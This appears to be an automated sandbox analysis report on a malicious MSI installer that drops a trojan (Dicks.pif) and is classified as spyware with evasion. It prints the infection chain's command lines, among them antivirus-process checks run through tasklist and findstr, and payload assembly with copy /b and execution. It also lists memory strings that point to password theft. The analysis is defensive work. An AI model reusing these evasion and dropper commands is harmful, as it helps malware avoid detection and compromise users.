              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_000BD164
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,23_2_000BD164

              System Summary

              barindex
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpFile dump: SymposiumTaiwan.exe.4.dr 895074384Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00877070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,4_2_00877070
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00088F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_00088F2E
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,8_2_004038AF
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00095778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_00095778
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00095778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,23_2_00095778
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\68e8ef.msiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA27.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA95.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAB6.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{F7154933-FAB7-4F13-A08C-0291DB5E5D05}Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB24.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\68e8f1.msiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\68e8f1.msiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIEA27.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_008859844_2_00885984
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_008784094_2_00878409
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0089E8D44_2_0089E8D4
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_008830E64_2_008830E6
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0087E0454_2_0087E045
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0087D1D24_2_0087D1D2
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088E94A4_2_0088E94A
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088FAC84_2_0088FAC8
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_008732034_2_00873203
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0087BA1A4_2_0087BA1A
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088F25E4_2_0088F25E
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0087DBE24_2_0087DBE2
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_008863F24_2_008863F2
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00882B3A4_2_00882B3A
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0089A35E4_2_0089A35E
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00892B784_2_00892B78
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0087EC974_2_0087EC97
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00885DB94_2_00885DB9
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00882DB54_2_00882DB5
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0087D5E44_2_0087D5E4
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00875E964_2_00875E96
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088F6934_2_0088F693
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00899EB04_2_00899EB0
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088EE464_2_0088EE46
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00884FB54_2_00884FB5
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00873FC54_2_00873FC5
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0087276C4_2_0087276C
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_0040737E8_2_0040737E
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_00406EFE8_2_00406EFE
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_004079A28_2_004079A2
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_004049A88_2_004049A8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0003B02019_2_0003B020
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000394E019_2_000394E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00039C8019_2_00039C80
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000523F519_2_000523F5
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000B840019_2_000B8400
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0006650219_2_00066502
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0006265E19_2_0006265E
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0003E6F019_2_0003E6F0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0005282A19_2_0005282A
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000689BF19_2_000689BF
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000B0A3A19_2_000B0A3A
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00066A7419_2_00066A74
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00040BE019_2_00040BE0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0005CD5119_2_0005CD51
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0008EDB219_2_0008EDB2
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00098E4419_2_00098E44
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000B0EB719_2_000B0EB7
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00066FE619_2_00066FE6
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000533B719_2_000533B7
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0005F40919_2_0005F409
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0004D45D19_2_0004D45D
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0004F62819_2_0004F628
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0003166319_2_00031663
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0003F6A019_2_0003F6A0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000516B419_2_000516B4
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000578C319_2_000578C3
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0005DBA519_2_0005DBA5
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00051BA819_2_00051BA8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00069CE519_2_00069CE5
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0004DD2819_2_0004DD28
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00051FC019_2_00051FC0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0005BFD619_2_0005BFD6
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000523F523_2_000523F5
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000B840023_2_000B8400
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0006650223_2_00066502
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0006265E23_2_0006265E
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0003E6F023_2_0003E6F0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0005282A23_2_0005282A
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000689BF23_2_000689BF
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000B0A3A23_2_000B0A3A
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00066A7423_2_00066A74
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00040BE023_2_00040BE0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0005CD5123_2_0005CD51
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0008EDB223_2_0008EDB2
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00098E4423_2_00098E44
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000B0EB723_2_000B0EB7
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00066FE623_2_00066FE6
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0003B02023_2_0003B020
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000533B723_2_000533B7
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0005F40923_2_0005F409
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0004D45D23_2_0004D45D
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000394E023_2_000394E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0004F62823_2_0004F628
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0003166323_2_00031663
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0003F6A023_2_0003F6A0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000516B423_2_000516B4
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000578C323_2_000578C3
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0005DBA523_2_0005DBA5
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00051BA823_2_00051BA8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00039C8023_2_00039C80
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00069CE523_2_00069CE5
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0004DD2823_2_0004DD28
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00051FC023_2_00051FC0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0005BFD623_2_0005BFD6
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E6201023_2_00E62010
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E855E023_2_00E855E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E867C823_2_00E867C8
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E7D72023_2_00E7D720
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E808D423_2_00E808D4
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E76B3023_2_00E76B30
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E93B1323_2_00E93B13
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E93D9023_2_00E93D90
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E6EFD023_2_00E6EFD0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E64FA023_2_00E64FA0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E662AF23_2_00E662AF
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E9C26023_2_00E9C260
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E833B923_2_00E833B9
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E6838023_2_00E68380
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E9A4F023_2_00E9A4F0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E824D323_2_00E824D3
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E815D023_2_00E815D0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E6458F23_2_00E6458F
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E9A61023_2_00E9A610
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E667A023_2_00E667A0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E8774123_2_00E87741
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E8689423_2_00E86894
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E9783023_2_00E97830
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E9AAF023_2_00E9AAF0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E99B0E23_2_00E99B0E
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E73C8823_2_00E73C88
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E6EC5023_2_00E6EC50
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E855E023_2_00E855E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E92C2023_2_00E92C20
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E6BDF023_2_00E6BDF0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E66D7023_2_00E66D70
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E65D3723_2_00E65D37
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E80D1023_2_00E80D10
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E83ED723_2_00E83ED7
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E65FC723_2_00E65FC7
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E84F5023_2_00E84F50
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E9BF3023_2_00E9BF30
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: String function: 004062CF appears 58 times
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: String function: 0088CEC0 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: String function: 0088D870 appears 31 times
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: String function: 0088CDF0 appears 37 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 00058B30 appears 84 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 00041A36 appears 68 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 00050D17 appears 140 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 00E68DF0 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 0005312D appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 00032111 appears 38 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 00E69570 appears 175 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 00034DC0 appears 40 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 000539FB appears 36 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 00061B70 appears 60 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 00041CB6 appears 50 times
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: String function: 00059FA5 appears 46 times
              Source: NB4EASbynx.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs NB4EASbynx.msi
              Source: classification engineClassification label: mal100.troj.spyw.evad.winMSI@33/67@2/1
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0009A6AD GetLastError,FormatMessageW,19_2_0009A6AD
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00088DE9 AdjustTokenPrivileges,CloseHandle,19_2_00088DE9
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00089399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_00089399
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00088DE9 AdjustTokenPrivileges,CloseHandle,23_2_00088DE9
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00089399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,23_2_00089399
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,8_2_004044D1
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00094148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,19_2_00094148
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_004024FB CoCreateInstance,8_2_004024FB
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00888BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,4_2_00888BD0
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\UpdateMSwindowsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6837546Jump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_03
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI4F6E.tmpJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCommand line argument: sfxname4_2_0088C131
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCommand line argument: sfxstime4_2_0088C131
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCommand line argument: STARTDLG4_2_0088C131
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Dicks.pif, 00000017.00000003.3167172073.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3167671554.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156112680.0000000003415000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3155983332.0000000003444000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: NB4EASbynx.msiReversingLabs: Detection: 18%
              Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NB4EASbynx.msi"
              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4C0B4EE6A62E23CFF044B1F01FFADBEC C
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp "C:\Users\user\AppData\Local\Temp\MSI53B9.tmp" -pqwerty2023 -s1
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess created: C:\Users\user\Desktop\SymposiumTaiwan.exe "C:\Users\user\Desktop\SymposiumTaiwan.exe"
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 558563
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cbsinchhavefcc" Basketball
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Upc + Beverages + Hero + Displaying + Version + Fm + Emotions 558563\k
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif 558563\Dicks.pif 558563\k
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E4C0896962209942EF6224878A6EC23
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifProcess created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp "C:\Users\user\AppData\Local\Temp\MSI53B9.tmp" -pqwerty2023 -s1Jump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4C0B4EE6A62E23CFF044B1F01FFADBEC CJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E4C0896962209942EF6224878A6EC23Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess created: C:\Users\user\Desktop\SymposiumTaiwan.exe "C:\Users\user\Desktop\SymposiumTaiwan.exe" Jump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
